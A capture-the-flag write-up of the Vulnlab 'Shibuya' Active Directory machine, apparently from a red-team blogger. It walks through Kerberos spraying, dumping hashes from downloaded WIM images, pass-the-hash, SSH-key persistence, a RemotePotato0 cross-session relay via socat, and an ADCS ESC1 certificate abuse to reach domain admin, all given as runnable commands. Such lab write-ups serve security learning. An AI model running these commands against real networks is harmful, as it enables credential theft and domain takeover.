Shibuya - Writeup (Vulnlab)

Table of contents
- NMAP
- FOOTHOLD
- Enumerating more domain users
- Getting TGT | svc_autojoin
- Extracting WIM files locally
- USER.txt | SMB Access like Simon.Watson
- SSH Persistence
- BloodHound Time
- Lateral Movement: Nigel.Mills
- Cross-Session Relay Attack
- Attacker side
- Victim side
- Nigel.Mills | Cracked Credentials
- ADCS & Vulnerable Template Discovery
- ESC1 ABUSE
- ROOT

░██████╗██╗░░██╗██╗██████╗░██╗░░░██╗██╗░░░██╗░█████╗░
██╔════╝██║░░██║██║██╔══██╗██║░░░██║╚██╗░██╔╝██╔══██╗
╚█████╗░███████║██║██████╦╝██║░░░██║░╚████╔╝░███████║
░╚═══██╗██╔══██║██║██╔══██╗██║░░░██║░░╚██╔╝░░██╔══██║
██████╔╝██║░░██║██║██████╦╝╚██████╔╝░░░██║░░░██║░░██║
╚═════╝░╚═╝░░╚═╝╚═╝╚═════╝░░╚═════╝░░░░╚═╝░░░╚═╝░░╚═╝
NMAP
22/tcp open ssh
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
FOOTHOLD
After some basic tests didn’t return anything useful, I started enumerating with Kerbrute.
This dictionary should be enough, I usually use it among the defaults xato-net-10-million-usernames.txt:
purple@shibuya.vl
red@shibuya.vl
I created a file named users.txt
and tried to use it with NetExec. NTLM auth didn’t work initially, so I tried Kerberos with -k flag:
nxc smb 10.129.62.234 -u users.txt -p <wordlist.txt> --shares --continue-on-success -k
Enumerating more domain users
We get a full list of domain accounts. Among them, the user svc_autojoin
stands out because its description contains a plaintext password:
nxc smb 10.129.62.234 -u red -p '<REDACTED>' --users -k
Getting TGT | svc_autojoin
We got a ticket for the new user: svc_autojoin
getTGT.py shibuya.vl/svc_autojoin:'<REDACTED>' -dc-ip 10.129.62.234
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in svc_autojoin.ccache
Then, export and I checked it with klist
and used Kerberos to connect via SMB:
export KRB5CCNAME=svc_autojoin.ccache
klist
smbclient.py AWSJPDC0522.shibuya.vl -k -no-pass
This user had access to images$
share. I listed and downloaded the .wim
files:
smbclient.py svc_autojoin@shibuya.vl
# use images$
# get AWSJPWK0222-01.wim
# get AWSJPWK0222-02.wim
# get AWSJPWK0222-03.wim
# get vss-meta.cab
Extracting WIM files locally
We extract the .wim
file using 7z
to inspect its contents:
7z x AWSJPWK0222-01.wim
The first image mostly contains user profiles, but nothing useful. We repeat the process with the second WIM file, which turns out to include sensitive registry hives like SAM
, SYSTEM
, and SECURITY
.
secretsdump.py -system SYSTEM -sam SAM -security SECURITY local
Hashes found
Administrator (Of course not working)
Guest
DefaultAccount
WDAGUtilityAccount
operator (This is interesting!! :D)
Simon.Watson (cached)
Assuming operator
hash belongs to Simon.Watson since he’s the only user with a local profile.
USER.txt | SMB Access like Simon.Watson
Once we recover the hash, we test SMB access using it directly with smbclient.py
:
smbclient.py simon.watson@AWSJPDC0522.shibuya.vl -hashes :<hash>
Access is successful, confirming that the hash is valid and usable. While browsing Simon’s home folder, we retrieve the user.txt
flag directly:
get user.txt
SSH Persistence
We upload an SSH key to Simon’s profile to keep stable access. First, on the attacker machine, we generate the key pair and prepare the authorized_keys
file:
ssh-keygen -t ed25519 -f simon -C "simon"
mv simon.pub authorized_keys
chmod 0600 simon
Here, simon
is the private key (which we’ll use to connect), and we copy the contents of simon.pub
into a file named authorized_keys
.
Then, using SMB access, we go to Simon’s home folder and create the .ssh
directory manually and upload the autorized_keys file:
mkdir .ssh
cd .ssh
put authorized_keys
This gives us persistent SSH access to the system using our private key. Remember, port 22 (SSH) was open since the initial NMAP scan!.
We connect via SSH:
ssh -i simon simon.watson@shibuya.vl
BloodHound Time
It’s only at this point in the box that I started doing some recon with BloodHound. Now that I have SSH access, the first thing I did was this:
ssh -i simon simon.watson@10.129.62.234 -D1080 -N
What I’m doing here: I’m creating a SOCKS proxy over SSH from my attacker machine to pivot traffic like LDAP through Simon’s access.
Now, by configuring proxychains to use that local SOCKS proxy, I can pull all the LDAP data for BloodHound straight from the DC:
proxychains nxc ldap AWSJPDC0522.shibuya.vl -u 'simon.watson' -H '<REDACTED>' --bloodhound -c all --dns-server 10.129.62.234
Lateral Movement: Nigel.Mills
After analyzing AD permissions with BloodHound, we confirm that the user ‘Nigel.Mills’ is a Tier 1 Admin and has RDP access. That makes him a high-value lateral movement target.
Once on the system, I try using evil-winrm to check for active sessions, but it doesn’t return anything useful. That’s because it runs under logon type 3 (network), which doesn’t allow us to see interactive sessions.
PS C:\ProgramData> qwinsta
No session exists for *
To get around that, I use ‘RunasCs.exe’ with logon type 9, which gives us a local token with full session visibility:
./runas.exe x x "qwinsta *" -l 9
This shows us a live session from ‘nigel.mills’ confirming he’s actively logged in. To move laterally and grab his NTLM hash, I use RemotePotato0 by Antonio Coco. (https://github.com/antonioCoco/RemotePotato0). We can perform a cross-session relay attack
Cross-Session Relay Attack
Cross-session relay attacks on Windows let you capture and reuse NTLM authentication from one user session into another. Basically, it allows a low-privileged user to hijack a higher-privileged session and act as that user.. without ever knowing their credentials!.
Attacker side
sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.129.62.234:8888
Victim side
.\rpotato.exe -m 2 -r 10.10.14.211 -x 10.10.14.211 -p 8888 -s 1
Nigel.Mills | Cracked Credentials
Finally from hashcat got Nigel.Mills credentials:
ADCS & Vulnerable Template Discovery
This machine has (ADCS) enabled. Now that we cracked Nigel.Mills credentials, we can use them to scan for vulnerable certificate templates with Certipy from our attack box:
certipy find -vulnerable -u NIGEL.MILLS@AWSJPDC0522.shibuya.vl -p "<REDACTED>" -target 10.129.62.234 -dc-ip 10.129.62.234 -stdout
We’ll focus on ESC1!.
ESC1 ABUSE
Because ‘nigel.mills’ is part of the ‘t1_admins’ group, he has permission to enroll for certificates using the vulnerable ShibuyaWeb
template.
This means we can easily abuse ESC1 by requesting a certificate for a different user (in this case, _admin
(Domain Admin)) and then authenticate as that user.
proxychains certipy req -u nigel.mills -p '<REDACTED>' -ca shibuya-AWSJPDC0522-CA -template ShibuyaWeb -upn _admin -dc-ip 10.129.62.234 -key-size 4096 -sid 'S-1-5-21-87560095-894484815-3652015022-500'
proxychains certipy auth -pfx _admin.pfx -domain shibuya.vl -username _admin -dc-ip 10.129.62.234
ROOT
Now that we’ve successfully authenticated as _admin
by abusing ESC1, we can fully compromise the Domain Controller.
We connect via SMB with the _admin
credentials and read the final flag:
proxychains nxc smb 10.129.62.234 -u _admin -H <REDACTED_HASH> -x 'type C:\Users\Administrator\Desktop\root.txt'
PWN3D!
Subscribe to my newsletter
Read articles from shkz directly inside your inbox. Subscribe to the newsletter, and don't miss out.
Written by

shkz
shkz
I am shkz, a Security Researcher, Red Team and CTF Player.